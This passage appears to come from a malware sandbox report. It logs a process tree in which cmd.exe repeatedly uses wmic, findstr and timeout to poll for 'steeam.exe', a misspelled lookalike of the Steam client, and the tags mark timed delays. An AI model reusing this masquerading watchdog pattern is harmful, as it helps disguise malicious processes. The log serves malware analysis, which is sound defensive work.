C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4024

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1844

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4400

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3652

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4068

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4668

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1564

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:316

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3624

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5044

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:368

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3940

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:360

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2152

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2752

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1156

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3300

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4480

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5028

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4628

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5016

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3456

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4068

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:200

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4484

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1096

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4420

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4480

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4132

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2792

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3996

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4612

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4032

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3704

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2752

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2740

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2488

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1856

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2920

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:708

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4612

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5032

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4656

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4148

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3700

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1772

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2184

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3984

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5100

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3928

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4668

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3268

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4332

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4148

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5044

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4544

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4676

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4680

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:292

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:436

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4332

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4876

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4572

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4916

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4188

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:316

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4668

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1704

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2556

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:436

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3300

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4568

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4332

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3984

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3652

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4060

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4612

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4656

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1376

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1772

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4472

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2172

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:400

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3940

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4788

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2184

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4416

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2004

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4324

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1156

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4608

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:368

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5104

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4536

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4748

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5068

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:32

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1564

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4028

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3628

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4416

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1936

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1592

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2988

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2800

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3960

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:664

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:648

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2320

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4596

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3944

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:560

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1020

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4188

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4956

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4512

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1592

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2988

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2676

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:1864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4144

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3452

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2800

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:60

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3156

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1352

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:648

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4032

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1320

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4360

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2776

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1260

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4240

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4020

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2796

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4064

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2164

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5096

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2512

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3944

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3984

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3652

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1172

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1060

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1004

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2596

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3524

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4236

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4208

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1684

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1632

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4964

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4748

C:\Windows\system32\cmd.exe
